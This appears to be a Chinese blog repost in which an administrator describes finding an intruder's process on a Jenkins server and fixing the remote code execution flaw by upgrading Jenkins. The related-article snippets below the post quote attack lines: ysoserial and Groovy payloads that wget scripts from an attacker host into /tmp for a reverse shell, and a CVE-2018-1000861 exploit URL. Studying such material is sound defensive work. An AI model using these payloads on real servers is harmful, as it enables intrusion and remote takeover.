Jenkins远程代码执行漏洞

最新推荐文章于 2024-07-09 15:19:13 发布
最新推荐文章于 2024-07-09 15:19:13 发布
阅读量119 收藏
点赞数
文章标签: 运维
原文链接:http://www.cnblogs.com/redheat/p/7069409.html
版权

于一个月前,进行服务器巡检时,发现服务器存在不明进程,并且以Jenkins用户身份来运行.当时进行了处理并修复了漏洞.在此补上修复过程

第一反应是Jenkins存在漏洞,于是Google Jenkins漏洞,瞬间出现一大批文章.

影响的范围:

影响低于 2.56 的所有 Jenkins 主线版本

影响低于 2.46.1 的所有 Jenkins LTS 版本

摘自https://xianzhi.aliyun.com/forum/read/1567.html

查看服务器Jenkins版本,正好是2.46.0版本

根据文中所述,自己搭建Jenkins进行了测试,测试完全通过.

修复过程:

  升级Jenkins到最新版本(直接替换jenkins.war)

# ll
总用量 136940
-rw-r--r-- 1 root root 70342163 5月  23 11:18 jenkins.war
-rw-r--r-- 1 root root 69875039 3月   2 03:51 jenkins.war.bak

附:yum安装Jenkins

wget -O /etc/yum.repos.d/jenkins.repo https://pkg.jenkins.io/redhat-stable/jenkins.repo
rpm --import https://pkg.jenkins.io/redhat-stable/jenkins.io.key

yum install jenkins

 

转载于:https://www.cnblogs.com/redheat/p/7069409.html

weixin_30861459
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Jenkins远程命令执行漏洞(CVE-2018-1000861)
玄道的网安博客
06-06 5566
1. 漏洞简介 Jenkins 是常见的CI/CD服务器, 最常见的就是爆破弱口令然后使用groovy执行命令 2. 影响组件 Jenkins 3. 漏洞指纹 Jenkins 4. Fofa Dork app="Jenkins" 5. 漏洞分析 这里我们是用docker快速搭建 git clone https://github.com/vulhub/vulhub.git cd /root/vulhub/jenkins/CVE-2018-1000861 docker-compose
漏洞复现】Jenkins远程命令执行漏洞(CVE-2018-1000861)
weixin_43486390的博客
12-21 2339
0x01 漏洞介绍 Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这个过程没有做限制,攻击者可以构造一些特殊的PATH来执行一些敏感的Java方法。 通过这个漏洞,我们可以找到很多可供利用的利用链。其中最严重的就是绕过Groovy沙盒导致未授权用户可执行任意命令:Jenkins在沙盒中执行Groovy前会先检查脚本是否有错误,检查操作是没有沙盒的,攻击者可以通过Meta-Programming的方式,在检查这个步骤时执行任意命令。 0x02 影响版本
Jenkins远程命令执行漏洞(CVE-2018-1000861)
最新发布
m0_68045701的博客
07-09 616
Jenkins 2.153和更早版本,LTS 2.138.3和更早版本使用的Stapler Web框架中的stapler/core/src/main/java/org/kohsuke/stapler/MetaClass.java中存在一个代码执行漏洞,攻击者可以使用该方法调用某些方法通过访问并非旨在通过这种方式调用的特制URL来访问Java对象。
jenkins 执行远程linux命令
08-15
jenkins 执行远程linux命令,jenkins 执行远程linux命令,jenkins 执行远程linux命令
web应用漏洞.docx
07-05
9. Jenkins 反序列化远程代码执行漏洞:攻击者可以通过该漏洞执行任意代码。 10. Jolokia 1.3.7 远程代码执行漏洞:攻击者可以通过该漏洞执行任意代码。 二、SQL 注入漏洞 1. BEESCMS admin/login.php SQL 注入...
jenkins publish over ssh
02-10
这样,每次代码更新后,Jenkins 将自动打包、发送文件并通过 SSH 到远程服务器执行部署操作。 6. 监控和日志:确保在 Jenkins 的构建日志中查看 "Publish Over SSH" 步骤的输出,以便了解文件传输和命令执行的状态...
jenkins.war
07-18
jenkins.war修复最新Apache Struts远程代码执行漏洞(CVE-2016-1000031。版本号:2.176
pwn_jenkins:有关攻击Jenkins服务器的注意事项
05-12
远程执行代码 旧版Jenkins中的反序列化RCE(CVE-2015-8103,Jenkins 1.638及更高版本) 使用生成有效负载。 然后使用RCE: java -jar ysoserial-master.jar CommonsCollections1 ' wget myip:myport -O /tmp/a.sh '...
JAVA反序列化漏洞知识点整理
01-20
jenkins反序列漏洞跟过一遍之后,虽说梳理清楚了漏洞触发的大体流程,但是对于JAVA反序列化漏洞导致代码执行的原理仍旧不懂,因此有必要整理JAVA反序列化漏洞相关的知识点。  JAVA反序列化漏洞  反序列化漏洞的...
[CVE-2017-1000353]Jenkins-CI 远程代码执行漏洞
https://www.cnblogs.com/zpchcbd/
09-21 488
vulhub环境搭建: cd /root/vulhub/jenkins/CVE-2017-1000353 docker-compose up -d 访问网址 http://120.79.66.58:8080/ 漏洞复现: 1、先下载CVE-2017-1000353-1.1-SNAPSHOT-all.jar来生成相应利用的poc java -jar CVE-2017-1000353-1.1-S...
Jenkins升级-- 无条件远程代码执行高危漏洞
skypig555的专栏
03-14 815
起因 早上收到阿里云的安全中心的电话,说检测到我们部分服务器使用了Jenkins,存在严重的安全漏洞。希望我们购买他们的安全防火墙,或者自己升级Jenkins。购买当然是不可能的拉。马上开始Jenkins升级。 硬货 停止之前的老版本 既然有漏洞,就先把老的版本服务停了。 安装新版本 这边我用的是docker-compose进行安装。docker和docker-compose的安装,自行百度。 v...
jenkins任意文件读取漏洞复现与分析 -CVE-2018-1999002
weixin_33894640的博客
08-09 316
jenkins任意文件读取漏洞复现与分析 -CVE-2018-1999002 0x00 漏洞影响版本 Jenkins weekly up to and including 2.132Jenkins LTS up to and including 2.121.1 0x01 漏洞原理分析 在没有登陆(未授权,cookie清空)的情况下,只有当管理员开启了allow anonymous read acc...
Jenkins未授权访问脚本执行漏洞
weixin_30883777的博客
05-17 720
Jenkins未授权访问脚本执行漏洞 步骤 首先找一个站点挂上一个反弹shell脚本,然后在脚本执行框里执行脚本进行下载到tmp目录: println "wget http://47.95.XXX.XXX/xxx.py -P /tmp/".execute().text 执行成功下面Result并没有反馈 然后我们执行命令允许反弹shell脚本 println "python...
Jenkins远程命令执行-CVE-2018-1000861
Xor0ne
08-01 632
1、漏洞环境 环境名称: jenkins-cve_2018_1000861 攻击机:kali 2、漏洞复现 2.1、方法一 我们直接在浏然器中输入: http://192.168.20.128:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript ?sandbox=true&value=publi
Jenkins远程连接Windows执行命令
古代宇航员的博客
06-21 4611
我在一台linux服务器上安装了Jenkins服务作为Jenkins服务器,除此之外,还有一台Windows电脑,安装了python环境,本地保存着自动化测试用的python代码,这台电脑用于执行基于chrome浏览器的自动化web测试。2台机器都处在同一个网络里。现在想要达到的效果是,利用Jenkins的定时构建任务,让Windows电脑能够定时地执行自动化测试,并返回结果,不需要人为的手动点击运行。
通过Jenkins执行远程服务器的自动化脚本
查拉图斯特拉面条的博客
11-03 1015
通过Jenkins,可自动执行写好的应用部署、自动化测试等的脚本工具,实现测试环境的应用自动定时更新、自动执行测试等。 1. 安装SSH插件   进入【系统管理】-【插件管理】-【可用插件】,搜索Publish Over SSH进行安装,随后重启jenkins 2. 配置SSH  进入【系统管理】-【系统配置】,找到Publish over SSH,进行配置 2.1 配置SSH Ser...
Jenkins执行shell命令(本地和远程执行)
热门推荐
fen_fen的专栏
12-22 2万+
jenkins执行shell命令 执行本地命令或shell脚本 执行本地的一个脚本 3.执行远程机器命令或shell脚本 3.1.ssh 插件要安装好配置ssh权限 3.2.点击“系统管理”-->“系统配置”, 添加权限(这里使用的是用户密码)后,点击check connection,Successfull connection代表连接成功。 4.执行远程机器10.1.1.74的shell脚本 test.sh #!/bin/bash cd /home/cg pwd e
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值